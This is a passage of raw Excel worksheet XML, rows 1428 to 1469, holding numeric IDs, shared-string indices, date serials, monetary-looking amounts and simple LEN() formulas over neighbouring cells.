      <c r="B1428">
        <v>2268</v>
      </c>
      <c r="C1428" t="s">
        <v>6789</v>
      </c>
      <c r="D1428" t="s">
        <v>9745</v>
      </c>
      <c r="E1428">
        <v>18</v>
      </c>
      <c r="F1428" t="s">
        <v>9749</v>
      </c>
      <c r="G1428" s="1">
        <v>43853</v>
      </c>
      <c r="H1428">
        <v>100000</v>
      </c>
      <c r="I1428" t="s">
        <v>9748</v>
      </c>
      <c r="K1428">
        <f>LEN(I1428)</f>
        <v>35</v>
      </c>
      <c r="L1428">
        <f>LEN(J1428)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1429" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1429">
        <v>17231</v>
      </c>
      <c r="B1429">
        <v>2306</v>
      </c>
      <c r="C1429" t="s">
        <v>6827</v>
      </c>
      <c r="D1429" t="s">
        <v>9737</v>
      </c>
      <c r="E1429">
        <v>16</v>
      </c>
      <c r="F1429" t="s">
        <v>9739</v>
      </c>
      <c r="G1429" s="1">
        <v>43857</v>
      </c>
      <c r="H1429">
        <v>200000</v>
      </c>
      <c r="I1429" t="s">
        <v>9740</v>
      </c>
      <c r="K1429">
        <f>LEN(I1429)</f>
        <v>33</v>
      </c>
      <c r="L1429">
        <f>LEN(J1429)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1430" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1430">
        <v>19291</v>
      </c>
      <c r="B1430">
        <v>2525</v>
      </c>
      <c r="C1430" t="s">
        <v>2621</v>
      </c>
      <c r="D1430" t="s">
        <v>9897</v>
      </c>
      <c r="E1430">
        <v>31</v>
      </c>
      <c r="F1430" t="s">
        <v>9898</v>
      </c>
      <c r="G1430" s="1">
        <v>43847</v>
      </c>
      <c r="H1430">
        <v>0</v>
      </c>
      <c r="I1430" t="s">
        <v>9899</v>
      </c>
      <c r="K1430">
        <f>LEN(I1430)</f>
        <v>33</v>
      </c>
      <c r="L1430">
        <f>LEN(J1430)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1431" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1431">
        <v>19292</v>
      </c>
      <c r="B1431">
        <v>2525</v>
      </c>
      <c r="C1431" t="s">
        <v>2621</v>
      </c>
      <c r="D1431" t="s">
        <v>9897</v>
      </c>
      <c r="E1431">
        <v>31</v>
      </c>
      <c r="F1431" t="s">
        <v>9900</v>
      </c>
      <c r="G1431" s="1">
        <v>43847</v>
      </c>
      <c r="H1431">
        <v>0</v>
      </c>
      <c r="I1431" t="s">
        <v>9899</v>
      </c>
      <c r="K1431">
        <f>LEN(I1431)</f>
        <v>33</v>
      </c>
      <c r="L1431">
        <f>LEN(J1431)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1432" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1432">
        <v>19293</v>
      </c>
      <c r="B1432">
        <v>2525</v>
      </c>
      <c r="C1432" t="s">
        <v>2621</v>
      </c>
      <c r="D1432" t="s">
        <v>9897</v>
      </c>
      <c r="E1432">
        <v>31</v>
      </c>
      <c r="F1432" t="s">
        <v>6917</v>
      </c>
      <c r="G1432" s="1">
        <v>43847</v>
      </c>
      <c r="H1432">
        <v>0</v>
      </c>
      <c r="I1432" t="s">
        <v>9899</v>
      </c>
      <c r="K1432">
        <f>LEN(I1432)</f>
        <v>33</v>
      </c>
      <c r="L1432">
        <f>LEN(J1432)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1433" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1433">
        <v>19294</v>
      </c>
      <c r="B1433">
        <v>2525</v>
      </c>
      <c r="C1433" t="s">
        <v>2621</v>
      </c>
      <c r="D1433" t="s">
        <v>9897</v>
      </c>
      <c r="E1433">
        <v>31</v>
      </c>
      <c r="F1433" t="s">
        <v>3763</v>
      </c>
      <c r="G1433" s="1">
        <v>43847</v>
      </c>
      <c r="H1433">
        <v>0</v>
      </c>
      <c r="I1433" t="s">
        <v>9899</v>
      </c>
      <c r="K1433">
        <f>LEN(I1433)</f>
        <v>33</v>
      </c>
      <c r="L1433">
        <f>LEN(J1433)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1434" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1434">
        <v>20067</v>
      </c>
      <c r="B1434">
        <v>2661</v>
      </c>
      <c r="C1434" t="s">
        <v>3761</v>
      </c>
      <c r="D1434" t="s">
        <v>10451</v>
      </c>
      <c r="E1434">
        <v>32</v>
      </c>
      <c r="F1434" t="s">
        <v>10453</v>
      </c>
      <c r="G1434" s="1">
        <v>43908</v>
      </c>
      <c r="H1434">
        <v>10000</v>
      </c>
      <c r="I1434" t="s">
        <v>9693</v>
      </c>
      <c r="K1434">
        <f>LEN(I1434)</f>
        <v>33</v>
      </c>
      <c r="L1434">
        <f>LEN(J1434)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1435" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1435">
        <v>20273</v>
      </c>
      <c r="B1435">
        <v>2711</v>
      </c>
      <c r="C1435" t="s">
        <v>6854</v>
      </c>
      <c r="D1435" t="s">
        <v>10590</v>
      </c>
      <c r="E1435">
        <v>29</v>
      </c>
      <c r="F1435" t="s">
        <v>10589</v>
      </c>
      <c r="G1435" s="1">
        <v>43935</v>
      </c>
      <c r="H1435">
        <v>50000</v>
      </c>
      <c r="I1435" t="s">
        <v>9693</v>
      </c>
      <c r="K1435">
        <f>LEN(I1435)</f>
        <v>33</v>
      </c>
      <c r="L1435">
        <f>LEN(J1435)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1436" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1436">
        <v>20471</v>
      </c>
      <c r="B1436">
        <v>2555</v>
      </c>
      <c r="C1436" t="s">
        <v>5007</v>
      </c>
      <c r="D1436" t="s">
        <v>10740</v>
      </c>
      <c r="E1436">
        <v>31</v>
      </c>
      <c r="F1436" t="s">
        <v>10742</v>
      </c>
      <c r="G1436" s="1">
        <v>43948</v>
      </c>
      <c r="H1436">
        <v>10000</v>
      </c>
      <c r="I1436" t="s">
        <v>10010</v>
      </c>
      <c r="K1436">
        <f>LEN(I1436)</f>
        <v>33</v>
      </c>
      <c r="L1436">
        <f>LEN(J1436)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1437" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1437">
        <v>20474</v>
      </c>
      <c r="B1437">
        <v>2555</v>
      </c>
      <c r="C1437" t="s">
        <v>5007</v>
      </c>
      <c r="D1437" t="s">
        <v>10740</v>
      </c>
      <c r="E1437">
        <v>31</v>
      </c>
      <c r="F1437" t="s">
        <v>9610</v>
      </c>
      <c r="G1437" s="1">
        <v>43948</v>
      </c>
      <c r="H1437">
        <v>10000</v>
      </c>
      <c r="I1437" t="s">
        <v>10010</v>
      </c>
      <c r="K1437">
        <f>LEN(I1437)</f>
        <v>33</v>
      </c>
      <c r="L1437">
        <f>LEN(J1437)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1438" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1438">
        <v>20475</v>
      </c>
      <c r="B1438">
        <v>2555</v>
      </c>
      <c r="C1438" t="s">
        <v>5007</v>
      </c>
      <c r="D1438" t="s">
        <v>10740</v>
      </c>
      <c r="E1438">
        <v>31</v>
      </c>
      <c r="F1438" t="s">
        <v>10304</v>
      </c>
      <c r="G1438" s="1">
        <v>43948</v>
      </c>
      <c r="H1438">
        <v>10000</v>
      </c>
      <c r="I1438" t="s">
        <v>10010</v>
      </c>
      <c r="K1438">
        <f>LEN(I1438)</f>
        <v>33</v>
      </c>
      <c r="L1438">
        <f>LEN(J1438)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1439" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1439">
        <v>20703</v>
      </c>
      <c r="B1439">
        <v>2776</v>
      </c>
      <c r="C1439" t="s">
        <v>7000</v>
      </c>
      <c r="D1439" t="s">
        <v>10904</v>
      </c>
      <c r="E1439">
        <v>29</v>
      </c>
      <c r="F1439" t="s">
        <v>10905</v>
      </c>
      <c r="G1439" s="1">
        <v>44012</v>
      </c>
      <c r="H1439">
        <v>100000</v>
      </c>
      <c r="I1439" t="s">
        <v>9693</v>
      </c>
      <c r="K1439">
        <f>LEN(I1439)</f>
        <v>33</v>
      </c>
      <c r="L1439">
        <f>LEN(J1439)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1440" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1440">
        <v>20737</v>
      </c>
      <c r="B1440">
        <v>2554</v>
      </c>
      <c r="C1440" t="s">
        <v>5016</v>
      </c>
      <c r="D1440" t="s">
        <v>9979</v>
      </c>
      <c r="E1440">
        <v>31</v>
      </c>
      <c r="F1440" t="s">
        <v>2236</v>
      </c>
      <c r="G1440" s="1">
        <v>43998</v>
      </c>
      <c r="H1440">
        <v>20000</v>
      </c>
      <c r="I1440" t="s">
        <v>10010</v>
      </c>
      <c r="K1440">
        <f>LEN(I1440)</f>
        <v>33</v>
      </c>
      <c r="L1440">
        <f>LEN(J1440)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1441" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1441">
        <v>21020</v>
      </c>
      <c r="B1441">
        <v>2810</v>
      </c>
      <c r="C1441" t="s">
        <v>6474</v>
      </c>
      <c r="D1441" t="s">
        <v>11100</v>
      </c>
      <c r="E1441">
        <v>31</v>
      </c>
      <c r="F1441" t="s">
        <v>11101</v>
      </c>
      <c r="G1441" s="1">
        <v>44074</v>
      </c>
      <c r="H1441">
        <v>126000</v>
      </c>
      <c r="I1441" t="s">
        <v>9693</v>
      </c>
      <c r="K1441">
        <f>LEN(I1441)</f>
        <v>33</v>
      </c>
      <c r="L1441">
        <f>LEN(J1441)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1442" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1442">
        <v>21021</v>
      </c>
      <c r="B1442">
        <v>2810</v>
      </c>
      <c r="C1442" t="s">
        <v>6474</v>
      </c>
      <c r="D1442" t="s">
        <v>11100</v>
      </c>
      <c r="E1442">
        <v>31</v>
      </c>
      <c r="F1442" t="s">
        <v>2236</v>
      </c>
      <c r="G1442" s="1">
        <v>44074</v>
      </c>
      <c r="H1442">
        <v>131000</v>
      </c>
      <c r="I1442" t="s">
        <v>9693</v>
      </c>
      <c r="K1442">
        <f>LEN(I1442)</f>
        <v>33</v>
      </c>
      <c r="L1442">
        <f>LEN(J1442)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1443" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1443">
        <v>21022</v>
      </c>
      <c r="B1443">
        <v>2810</v>
      </c>
      <c r="C1443" t="s">
        <v>6474</v>
      </c>
      <c r="D1443" t="s">
        <v>11100</v>
      </c>
      <c r="E1443">
        <v>31</v>
      </c>
      <c r="F1443" t="s">
        <v>11102</v>
      </c>
      <c r="G1443" s="1">
        <v>44074</v>
      </c>
      <c r="H1443">
        <v>5000</v>
      </c>
      <c r="I1443" t="s">
        <v>9693</v>
      </c>
      <c r="K1443">
        <f>LEN(I1443)</f>
        <v>33</v>
      </c>
      <c r="L1443">
        <f>LEN(J1443)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1444" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1444">
        <v>21023</v>
      </c>
      <c r="B1444">
        <v>2810</v>
      </c>
      <c r="C1444" t="s">
        <v>6474</v>
      </c>
      <c r="D1444" t="s">
        <v>11100</v>
      </c>
      <c r="E1444">
        <v>31</v>
      </c>
      <c r="F1444" t="s">
        <v>3763</v>
      </c>
      <c r="G1444" s="1">
        <v>44074</v>
      </c>
      <c r="H1444">
        <v>2000</v>
      </c>
      <c r="I1444" t="s">
        <v>9693</v>
      </c>
      <c r="K1444">
        <f>LEN(I1444)</f>
        <v>33</v>
      </c>
      <c r="L1444">
        <f>LEN(J1444)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1445" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1445">
        <v>21094</v>
      </c>
      <c r="B1445">
        <v>604</v>
      </c>
      <c r="C1445" t="s">
        <v>1503</v>
      </c>
      <c r="D1445" t="s">
        <v>11132</v>
      </c>
      <c r="E1445">
        <v>27</v>
      </c>
      <c r="F1445" t="s">
        <v>11133</v>
      </c>
      <c r="G1445" s="1">
        <v>44005</v>
      </c>
      <c r="H1445">
        <v>1700</v>
      </c>
      <c r="I1445" t="s">
        <v>10003</v>
      </c>
      <c r="K1445">
        <f>LEN(I1445)</f>
        <v>33</v>
      </c>
      <c r="L1445">
        <f>LEN(J1445)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1446" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1446">
        <v>21177</v>
      </c>
      <c r="B1446">
        <v>743</v>
      </c>
      <c r="C1446" t="s">
        <v>905</v>
      </c>
      <c r="D1446" t="s">
        <v>11186</v>
      </c>
      <c r="E1446">
        <v>16</v>
      </c>
      <c r="F1446" t="s">
        <v>11191</v>
      </c>
      <c r="G1446" s="1">
        <v>44159</v>
      </c>
      <c r="H1446">
        <v>10000</v>
      </c>
      <c r="I1446" t="s">
        <v>11192</v>
      </c>
      <c r="K1446">
        <f>LEN(I1446)</f>
        <v>33</v>
      </c>
      <c r="L1446">
        <f>LEN(J1446)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1447" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1447">
        <v>21181</v>
      </c>
      <c r="B1447">
        <v>2820</v>
      </c>
      <c r="C1447" t="s">
        <v>7097</v>
      </c>
      <c r="D1447" t="s">
        <v>11193</v>
      </c>
      <c r="E1447">
        <v>33</v>
      </c>
      <c r="F1447" t="s">
        <v>9756</v>
      </c>
      <c r="G1447" s="1">
        <v>44001</v>
      </c>
      <c r="H1447">
        <v>50000</v>
      </c>
      <c r="I1447" t="s">
        <v>9693</v>
      </c>
      <c r="K1447">
        <f>LEN(I1447)</f>
        <v>33</v>
      </c>
      <c r="L1447">
        <f>LEN(J1447)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1448" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1448">
        <v>21182</v>
      </c>
      <c r="B1448">
        <v>2820</v>
      </c>
      <c r="C1448" t="s">
        <v>7097</v>
      </c>
      <c r="D1448" t="s">
        <v>11193</v>
      </c>
      <c r="E1448">
        <v>33</v>
      </c>
      <c r="F1448" t="s">
        <v>11196</v>
      </c>
      <c r="G1448" s="1">
        <v>44001</v>
      </c>
      <c r="H1448">
        <v>50000</v>
      </c>
      <c r="I1448" t="s">
        <v>9693</v>
      </c>
      <c r="K1448">
        <f>LEN(I1448)</f>
        <v>33</v>
      </c>
      <c r="L1448">
        <f>LEN(J1448)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1449" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1449">
        <v>21183</v>
      </c>
      <c r="B1449">
        <v>2820</v>
      </c>
      <c r="C1449" t="s">
        <v>7097</v>
      </c>
      <c r="D1449" t="s">
        <v>11193</v>
      </c>
      <c r="E1449">
        <v>33</v>
      </c>
      <c r="F1449" t="s">
        <v>3763</v>
      </c>
      <c r="G1449" s="1">
        <v>44001</v>
      </c>
      <c r="H1449">
        <v>50000</v>
      </c>
      <c r="I1449" t="s">
        <v>9693</v>
      </c>
      <c r="K1449">
        <f>LEN(I1449)</f>
        <v>33</v>
      </c>
      <c r="L1449">
        <f>LEN(J1449)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1450" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1450">
        <v>21184</v>
      </c>
      <c r="B1450">
        <v>2820</v>
      </c>
      <c r="C1450" t="s">
        <v>7097</v>
      </c>
      <c r="D1450" t="s">
        <v>11193</v>
      </c>
      <c r="E1450">
        <v>33</v>
      </c>
      <c r="F1450" t="s">
        <v>2236</v>
      </c>
      <c r="G1450" s="1">
        <v>44001</v>
      </c>
      <c r="H1450">
        <v>60000</v>
      </c>
      <c r="I1450" t="s">
        <v>9693</v>
      </c>
      <c r="K1450">
        <f>LEN(I1450)</f>
        <v>33</v>
      </c>
      <c r="L1450">
        <f>LEN(J1450)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1451" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1451">
        <v>21195</v>
      </c>
      <c r="B1451">
        <v>197</v>
      </c>
      <c r="C1451" t="s">
        <v>1562</v>
      </c>
      <c r="D1451" t="s">
        <v>11201</v>
      </c>
      <c r="E1451">
        <v>31</v>
      </c>
      <c r="F1451" t="s">
        <v>11204</v>
      </c>
      <c r="G1451" s="1">
        <v>44019</v>
      </c>
      <c r="H1451">
        <v>300000</v>
      </c>
      <c r="I1451" t="s">
        <v>10010</v>
      </c>
      <c r="K1451">
        <f>LEN(I1451)</f>
        <v>33</v>
      </c>
      <c r="L1451">
        <f>LEN(J1451)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1452" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1452">
        <v>20283</v>
      </c>
      <c r="B1452">
        <v>571</v>
      </c>
      <c r="C1452" t="s">
        <v>851</v>
      </c>
      <c r="D1452" t="s">
        <v>10598</v>
      </c>
      <c r="E1452">
        <v>23</v>
      </c>
      <c r="F1452" t="s">
        <v>10346</v>
      </c>
      <c r="G1452" s="1">
        <v>43962</v>
      </c>
      <c r="H1452">
        <v>8400</v>
      </c>
      <c r="I1452" t="s">
        <v>10599</v>
      </c>
      <c r="K1452">
        <f>LEN(I1452)</f>
        <v>31</v>
      </c>
      <c r="L1452">
        <f>LEN(J1452)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1453" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1453">
        <v>20284</v>
      </c>
      <c r="B1453">
        <v>571</v>
      </c>
      <c r="C1453" t="s">
        <v>851</v>
      </c>
      <c r="D1453" t="s">
        <v>10598</v>
      </c>
      <c r="E1453">
        <v>23</v>
      </c>
      <c r="F1453" t="s">
        <v>1403</v>
      </c>
      <c r="G1453" s="1">
        <v>43962</v>
      </c>
      <c r="H1453">
        <v>12000</v>
      </c>
      <c r="I1453" t="s">
        <v>10599</v>
      </c>
      <c r="K1453">
        <f>LEN(I1453)</f>
        <v>31</v>
      </c>
      <c r="L1453">
        <f>LEN(J1453)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1454" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1454">
        <v>20024</v>
      </c>
      <c r="B1454">
        <v>704</v>
      </c>
      <c r="C1454" t="s">
        <v>664</v>
      </c>
      <c r="D1454" t="s">
        <v>10405</v>
      </c>
      <c r="E1454">
        <v>2</v>
      </c>
      <c r="F1454" t="s">
        <v>10406</v>
      </c>
      <c r="G1454" s="1">
        <v>43942</v>
      </c>
      <c r="H1454">
        <v>500000</v>
      </c>
      <c r="I1454" t="s">
        <v>10407</v>
      </c>
      <c r="K1454">
        <f>LEN(I1454)</f>
        <v>30</v>
      </c>
      <c r="L1454">
        <f>LEN(J1454)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1455" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1455">
        <v>20710</v>
      </c>
      <c r="B1455">
        <v>2250</v>
      </c>
      <c r="C1455" t="s">
        <v>5879</v>
      </c>
      <c r="D1455" t="s">
        <v>10911</v>
      </c>
      <c r="E1455">
        <v>7</v>
      </c>
      <c r="F1455" t="s">
        <v>10912</v>
      </c>
      <c r="G1455" s="1">
        <v>44272</v>
      </c>
      <c r="H1455">
        <v>120</v>
      </c>
      <c r="I1455" t="s">
        <v>10913</v>
      </c>
      <c r="K1455">
        <f>LEN(I1455)</f>
        <v>30</v>
      </c>
      <c r="L1455">
        <f>LEN(J1455)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1456" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1456">
        <v>20849</v>
      </c>
      <c r="B1456">
        <v>538</v>
      </c>
      <c r="C1456" t="s">
        <v>824</v>
      </c>
      <c r="D1456" t="s">
        <v>11032</v>
      </c>
      <c r="E1456">
        <v>11</v>
      </c>
      <c r="F1456" t="s">
        <v>11035</v>
      </c>
      <c r="G1456" s="1">
        <v>44012</v>
      </c>
      <c r="H1456">
        <v>0</v>
      </c>
      <c r="I1456" t="s">
        <v>11036</v>
      </c>
      <c r="K1456">
        <f>LEN(I1456)</f>
        <v>30</v>
      </c>
      <c r="L1456">
        <f>LEN(J1456)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1457" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1457">
        <v>21194</v>
      </c>
      <c r="B1457">
        <v>197</v>
      </c>
      <c r="C1457" t="s">
        <v>1562</v>
      </c>
      <c r="D1457" t="s">
        <v>11201</v>
      </c>
      <c r="E1457">
        <v>31</v>
      </c>
      <c r="F1457" t="s">
        <v>11202</v>
      </c>
      <c r="G1457" s="1">
        <v>44019</v>
      </c>
      <c r="H1457">
        <v>300000</v>
      </c>
      <c r="I1457" t="s">
        <v>11203</v>
      </c>
      <c r="K1457">
        <f>LEN(I1457)</f>
        <v>30</v>
      </c>
      <c r="L1457">
        <f>LEN(J1457)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1458" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1458">
        <v>19251</v>
      </c>
      <c r="B1458">
        <v>1238</v>
      </c>
      <c r="C1458" t="s">
        <v>344</v>
      </c>
      <c r="D1458" t="s">
        <v>9467</v>
      </c>
      <c r="E1458">
        <v>16</v>
      </c>
      <c r="F1458" t="s">
        <v>673</v>
      </c>
      <c r="G1458" s="1">
        <v>43922</v>
      </c>
      <c r="H1458">
        <v>200000</v>
      </c>
      <c r="I1458" t="s">
        <v>9870</v>
      </c>
      <c r="K1458">
        <f>LEN(I1458)</f>
        <v>25</v>
      </c>
      <c r="L1458">
        <f>LEN(J1458)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1459" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1459">
        <v>21367</v>
      </c>
      <c r="B1459">
        <v>2839</v>
      </c>
      <c r="C1459" t="s">
        <v>7112</v>
      </c>
      <c r="D1459" t="s">
        <v>11334</v>
      </c>
      <c r="E1459">
        <v>3</v>
      </c>
      <c r="F1459" t="s">
        <v>7114</v>
      </c>
      <c r="G1459" s="1">
        <v>44046</v>
      </c>
      <c r="H1459">
        <v>360</v>
      </c>
      <c r="I1459" t="s">
        <v>11335</v>
      </c>
      <c r="K1459">
        <f>LEN(I1459)</f>
        <v>21</v>
      </c>
      <c r="L1459">
        <f>LEN(J1459)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1460" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1460">
        <v>19436</v>
      </c>
      <c r="B1460">
        <v>1514</v>
      </c>
      <c r="C1460" t="s">
        <v>2689</v>
      </c>
      <c r="D1460" t="s">
        <v>10041</v>
      </c>
      <c r="E1460">
        <v>16</v>
      </c>
      <c r="F1460" t="s">
        <v>9739</v>
      </c>
      <c r="G1460" s="1">
        <v>43850</v>
      </c>
      <c r="H1460">
        <v>1000</v>
      </c>
      <c r="I1460" t="s">
        <v>10042</v>
      </c>
      <c r="K1460">
        <f>LEN(I1460)</f>
        <v>20</v>
      </c>
      <c r="L1460">
        <f>LEN(J1460)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1461" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1461">
        <v>19437</v>
      </c>
      <c r="B1461">
        <v>1514</v>
      </c>
      <c r="C1461" t="s">
        <v>2689</v>
      </c>
      <c r="D1461" t="s">
        <v>10041</v>
      </c>
      <c r="E1461">
        <v>16</v>
      </c>
      <c r="F1461" t="s">
        <v>10043</v>
      </c>
      <c r="G1461" s="1">
        <v>43850</v>
      </c>
      <c r="H1461">
        <v>1000</v>
      </c>
      <c r="I1461" t="s">
        <v>10042</v>
      </c>
      <c r="K1461">
        <f>LEN(I1461)</f>
        <v>20</v>
      </c>
      <c r="L1461">
        <f>LEN(J1461)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1462" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1462">
        <v>19438</v>
      </c>
      <c r="B1462">
        <v>1514</v>
      </c>
      <c r="C1462" t="s">
        <v>2689</v>
      </c>
      <c r="D1462" t="s">
        <v>10041</v>
      </c>
      <c r="E1462">
        <v>16</v>
      </c>
      <c r="F1462" t="s">
        <v>9437</v>
      </c>
      <c r="G1462" s="1">
        <v>43850</v>
      </c>
      <c r="H1462">
        <v>1000</v>
      </c>
      <c r="I1462" t="s">
        <v>10042</v>
      </c>
      <c r="K1462">
        <f>LEN(I1462)</f>
        <v>20</v>
      </c>
      <c r="L1462">
        <f>LEN(J1462)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1463" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1463">
        <v>20430</v>
      </c>
      <c r="B1463">
        <v>217</v>
      </c>
      <c r="C1463" t="s">
        <v>817</v>
      </c>
      <c r="D1463" t="s">
        <v>10702</v>
      </c>
      <c r="E1463">
        <v>16</v>
      </c>
      <c r="F1463" t="s">
        <v>3242</v>
      </c>
      <c r="G1463" s="1">
        <v>44081</v>
      </c>
      <c r="H1463">
        <v>10000</v>
      </c>
      <c r="I1463" t="s">
        <v>10703</v>
      </c>
      <c r="K1463">
        <f>LEN(I1463)</f>
        <v>20</v>
      </c>
      <c r="L1463">
        <f>LEN(J1463)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1464" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1464">
        <v>20432</v>
      </c>
      <c r="B1464">
        <v>228</v>
      </c>
      <c r="C1464" t="s">
        <v>1023</v>
      </c>
      <c r="D1464" t="s">
        <v>10704</v>
      </c>
      <c r="E1464">
        <v>16</v>
      </c>
      <c r="F1464" t="s">
        <v>3242</v>
      </c>
      <c r="G1464" s="1">
        <v>44081</v>
      </c>
      <c r="H1464">
        <v>5000</v>
      </c>
      <c r="I1464" t="s">
        <v>10703</v>
      </c>
      <c r="K1464">
        <f>LEN(I1464)</f>
        <v>20</v>
      </c>
      <c r="L1464">
        <f>LEN(J1464)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1465" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1465">
        <v>21097</v>
      </c>
      <c r="B1465">
        <v>475</v>
      </c>
      <c r="C1465" t="s">
        <v>1519</v>
      </c>
      <c r="D1465" t="s">
        <v>11137</v>
      </c>
      <c r="E1465">
        <v>16</v>
      </c>
      <c r="F1465" t="s">
        <v>1651</v>
      </c>
      <c r="G1465" s="1">
        <v>44039</v>
      </c>
      <c r="H1465">
        <v>1490024</v>
      </c>
      <c r="I1465" t="s">
        <v>11138</v>
      </c>
      <c r="K1465">
        <f>LEN(I1465)</f>
        <v>20</v>
      </c>
      <c r="L1465">
        <f>LEN(J1465)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1466" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1466">
        <v>16913</v>
      </c>
      <c r="B1466">
        <v>359</v>
      </c>
      <c r="C1466" t="s">
        <v>517</v>
      </c>
      <c r="D1466" t="s">
        <v>9570</v>
      </c>
      <c r="E1466">
        <v>11</v>
      </c>
      <c r="F1466" t="s">
        <v>9573</v>
      </c>
      <c r="G1466" s="1">
        <v>43900</v>
      </c>
      <c r="H1466">
        <v>100000</v>
      </c>
      <c r="I1466" t="s">
        <v>9571</v>
      </c>
      <c r="K1466">
        <f>LEN(I1466)</f>
        <v>19</v>
      </c>
      <c r="L1466">
        <f>LEN(J1466)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1467" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1467">
        <v>20479</v>
      </c>
      <c r="B1467">
        <v>2314</v>
      </c>
      <c r="C1467" t="s">
        <v>5848</v>
      </c>
      <c r="D1467" t="s">
        <v>10743</v>
      </c>
      <c r="E1467">
        <v>6</v>
      </c>
      <c r="F1467" t="s">
        <v>6141</v>
      </c>
      <c r="G1467" s="1">
        <v>43913</v>
      </c>
      <c r="H1467">
        <v>10000</v>
      </c>
      <c r="I1467" t="s">
        <v>9852</v>
      </c>
      <c r="K1467">
        <f>LEN(I1467)</f>
        <v>19</v>
      </c>
      <c r="L1467">
        <f>LEN(J1467)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1468" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1468">
        <v>20480</v>
      </c>
      <c r="B1468">
        <v>2314</v>
      </c>
      <c r="C1468" t="s">
        <v>5848</v>
      </c>
      <c r="D1468" t="s">
        <v>10743</v>
      </c>
      <c r="E1468">
        <v>6</v>
      </c>
      <c r="F1468" t="s">
        <v>10744</v>
      </c>
      <c r="G1468" s="1">
        <v>43913</v>
      </c>
      <c r="H1468">
        <v>15000</v>
      </c>
      <c r="I1468" t="s">
        <v>9852</v>
      </c>
      <c r="K1468">
        <f>LEN(I1468)</f>
        <v>19</v>
      </c>
      <c r="L1468">
        <f>LEN(J1468)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1469" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A1469">
        <v>20606</v>
      </c>
      <c r="B1469">
        <v>935</v>
      </c>
      <c r="C1469" t="s">
        <v>2886</v>
      </c>
      <c r="D1469" t="s">
        <v>10843</v>
      </c>
      <c r="E1469">
        <v>13</v>
      </c>
      <c r="F1469" t="s">
        <v>10848</v>
      </c>
      <c r="G1469" s="1">
        <v>44103</v>
      </c>
      <c r="H1469">
        <v>0</v>
      </c>
      <c r="I1469" t="s">
        <v>9571</v>
      </c>
      <c r="K1469">
        <f>LEN(I1469)</f>
        <v>19</v>
      </c>
      <c r="L1469">
